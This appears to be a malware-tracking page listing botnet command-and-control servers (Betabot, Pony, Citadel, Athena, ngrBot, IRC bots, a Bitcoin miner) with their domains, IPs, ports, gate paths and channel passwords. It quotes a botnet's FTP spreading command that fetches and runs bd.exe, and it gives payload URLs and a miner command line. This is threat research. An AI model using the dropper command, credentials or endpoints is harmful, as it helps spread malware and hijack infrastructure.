Resolved : [priv8.blackunix.com] To [209.59.209.111] Server: 209.59.209.111:5545 Server Password: ownz Username: xcembmbr Nickname: priv88qPCdHIIQo The botnet spreads via ftp : cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exitRead more...
strike-file-hosting.us (Betabot http botnet hosted by santrex.net)
Resolved strike-file-hosting.us to 46.166.184.109 Server: strike-file-hosting.us Gate file: /b/order.php Backup domain: gethostingfast.info Based on the domain, I’d say that this is digitals. Hosting infos: http://whois.domaintools.com/46.166.184.109
Sydnexoyex.us(Pony hosted in Germany Gunzenhausen Tt International D.o.o.)
Traffic – by URL Sydnexoyex.us/p.exe Sydnexoyex.us/4df1in1/gate.php Sydnexoyex.us/DiBU064/s.exe Sydnexoyex.us/DiBU064/st.exe j.maxmind.com/app/geoip.js euntsutviek.cm/CgUACgIOCEcKBgRGCkcZARlWAFQ5WBAlJltdOhMZCFFaGTgiHQ4cBC0ABTEKDSMhXi4kTFsvKx4ILzomWTsAOAQvBDEMPF8hBy8IJgIgUA4qHjE4GQ8OGB4ABCwnDFBYPh0bBwNfITo5CBMKWV0QGwhfJT8jJCQtE1oQAjAEACpcIh4kICwoUTEOESY9XhoqIw8/Bx0oGhANOA1YHV5YXjBdOQQoDD8sHyUAHy06HC0HXTtMWysaKF4BWVAgCycLPV4ODz4cCw4ZLTEhLyQjDlxdXiIuIVkKOExbLwITGl0dASsoClooHi8kCCAaKAsxPxEsOiUtGlgeL0xbLzgkXjMQJSA8OkxbLyw6WD0bEBwAEDM9Ox4EWicgHwMkUTkvD15RCCATODAfX10RKiswMxwnBhpRClEkE1sCLlEOBy0OXj4EDgsqJRAsJwdYIzhYUTABBVFQWS4ALQoRARkmDC8IAVEGPytRPR4xGCEKWSAhI14BXyhMWy8GK1w8MC0+BiscGSQ8ICRaUBAOGQQkBFECLloiKAwsXRgCAxsrWlk6GDgZIjorDBwrIzFZKCATWQUMXRg4A1hZKgMEHi8DPTkTLD4KHwg/LBolOlBYMwAYXQIhDgMEMExbLzwqAxBaCzoPEVseDR0IECJMWytMWysvKC04XSMRXkxbLxBZDzsDUBMCBxkaUF0rGCgmPAQlMR8wGjgsABpdXi4aEyIvMQw9Gy5RTFsvMFErWjomHzs+PVAfCz4NDV4wECgMXx1eUSoIKhpdLCpaXTEMI0xbL1o+UTEfMVsjARkMJhwBPD1RBzMqWAsCLjMvAwYYOysoHBMoURkKLwsxBSY7Xzw8LhkjUCI+KkxbKyQzWlABP1ECAVw6CwwGGjkmCisRUR0aES4MHQ8CJzsEXQEZL1oTLScFWjEBOCFdARwFAQtaLwwwLR0QDQwtKygNB1ECAwdRBzALGQ0iAF8PER8BKgUYWgcNXiY7LAAzGxoQHR8CEz8ZGyheAxAIMV89OxoAOgxYPlBREBsgTFsvMSABBFAEDgQ/MBooIg45Bz5MWys4GVhdWBwsLQMoLwcQTFsrMxAYJVkuM10mC1BbWx4kAio4G1ooPCE+IR8BACE/IAUtUBACJVw6LC4PWScdOD07URERXRwdETEsTFsvESUcICEGLFs9LAEQPT8HLBhZAVBbMF5eBlxMWysZEFkgIVAOWl4MDgInXzkcUAEMGFs7OwQIMx85HTskWCc6IiouGj0qMCUlWxw/OiIrEC8FOi4nXCYoWichPSgiECMuUAUeUBEBLQYuHlAaBUxbL18bHF0/TFsvLAgsISwTUAZYJlAFHzwsJRwfIjkiJQYjXRsYAF0bTFsrWjwuGyUjGiItGSUkHCEmKwImXz9YHC4NOF8POD8rDTpdWiolLExbKwwdWhBQMy0vEw8ZKCwhJVE8KgAuBAMuDyA+WD0RXjgZIVEaKj4gLAQGXCQqTFsrORoNAwYYEV1fC0xbLxoRDB1YK1wmWFAKMy4kOhsbPCw5P0xbK0xbK10aTFsrIwtfEV8wLh8/LSoLAl4AJxMtWTwTMywlHExbLygHAzo8Ah8CGDk5PgAAJyUuHQwqAkxaLQ== More files here hxxp://sydnexoyex.us/4df1in1/ Admin Panel:hxxp://sydnexoyex.us/4df1in1/admin.php hosting infos: http://whois.domaintools.com/176.9.208.113
highroller.pxnet.to (Betabot http botnet hosted by server4.pro)
Resolved highroller.pxnet.to to 176.31.53.143 Domain: highroller.pxnet.to Port: 666 Gate file: /sbn-admin/order.php Yes, the moron is hosting his http server on the very spooky port 666 rather than the usual port 80. Backup domains: sbn.pxnet.to cpstw.santros.ws ccc.santros.ws vg.allrounders.cc zp.swissfaking.biz Now he use diferent ip : highroller.pxnet.to 176.31.53.143 http://176.31.53.143/sbn-admin/order.php (highroller.pxnet.to) Remote server: highroller.pxnet.to TCP port 666Read more...
googlesafebrowsing-counter.org (Citadel banking malware hosted by Fastflux botnet)
Server: googlesafebrowsing-counter.org Config dropper: /file.php The server seems to be poorly configured and it never returns a config file. Backup domain: googlesafebrowsing-cache.org Example fastflux info ;; QUESTION SECTION: ;googlesafebrowsing-counter.org. IN A ;; ANSWER SECTION: googlesafebrowsing-counter.org. 150 IN A 94.158.73.89 googlesafebrowsing-counter.org. 150 IN A 94.230.198.162 googlesafebrowsing-counter.org. 150 IN A 99.231.159.61 googlesafebrowsing-counter.org. 150 IN A 176.8.252.213 googlesafebrowsing-counter.org.Read more...
xjnhtraj.com (Athena irc botnet hosted by tatacommunications.com)
Server: xjnhtraj.com Port: 6667 Channel: #xjnhtraj Channel password: xjnhtraj Opers: [dwa] (dada@chidaica123): đuawa[dwa] #xjnhtraj [dwa] irc.server.net :IRC server[dwa] is a Bot on IRC server[dwa] idle 00:01:17, signon: Mon Mar 11 15:15:07[dwa] End of WHOIS list. [Troc] (trocdsds@chidaica123): Troc[Troc] #xjnhtraj [Troc] irc.server.net :IRC server[Troc] is a Bot on IRC server[Troc] idle 00:02:11, signon: Mon Mar 11Read more...
x1x4x0.su (snk asper mod irc botnet hosted by oneandone.net)
Server: x1x4x0.su (alternate domain phorpiex.su) Port: 5050 Channel: #b Topic for #b is: .j #m .d /100/97/111/124/49/59/47/96/100/124/114/74/123/122/46/115/125/109/49/117/108/63/39/53/40/48/51/16/45/62/35/63/69/107/55/34/37/35/17/44/83/85/100/110/108/61/108/114/122/10/73/102/97/114/ Topic for #b set by x at Mon Mar 11 12:15:31 2013 Topic for #m is: .s.a /100/97/111/124/49/59/47/58/58/63/58/18/33/47/46/34/35/51/48/34/53/63/102/121/115/105/43/64/100/105/ /100/97/111/124/49/59/47/58/58/63/58/18/33/47/46/34/35/51/48/34/53/63/ 327 pul4rn0t Topic for #m set by x at Mon Mar 11 12:15:41 2013 Channel: #i Sample:hxxp://217.160.213.35/pula.exe Hosting infos:Read more...
us2.eclipsemc.com(Bitcoin Miner hosted in United States Kansas City Joe’s Datacenter Llc)
Mining for http://us2.eclipsemc.com:8337Using CPU (1 threads) Command Line: “C:file.exe” -o http://us2.eclipsemc.com:8337 -u m1nd_1 -p 13753216 sample here hosting infos: http://whois.domaintools.com/69.195.155.226
199.229.249.189(irc botnet hosted in United States Atlanta Colo At 55 Llc)
Remote Host Port Number 199.229.249.189 443 Local users: 131 4000 Current local users 131, max 4000 Global users: 140 4010 Current global users 140, max 4010 USER zwin- 127.0.0.1 localhost :Operation Dildos NICK zwin-WHDKCF|1837| JOIN #test : JOIN #test3 :god NICK zwin-TIGYPT|1952| Hosting infos: http://whois.domaintools.com/199.229.249.189
altincopps.com(ngrBot hosted in United States Network Operations Center Inc.)
Server: 64.120.135.140:1434 Username: mmgamzu Nickname: n{DE|XPa}mmgamzu Channel: #mrag (Password: ngrBot) hosting infos: http://whois.domaintools.com/64.120.135.140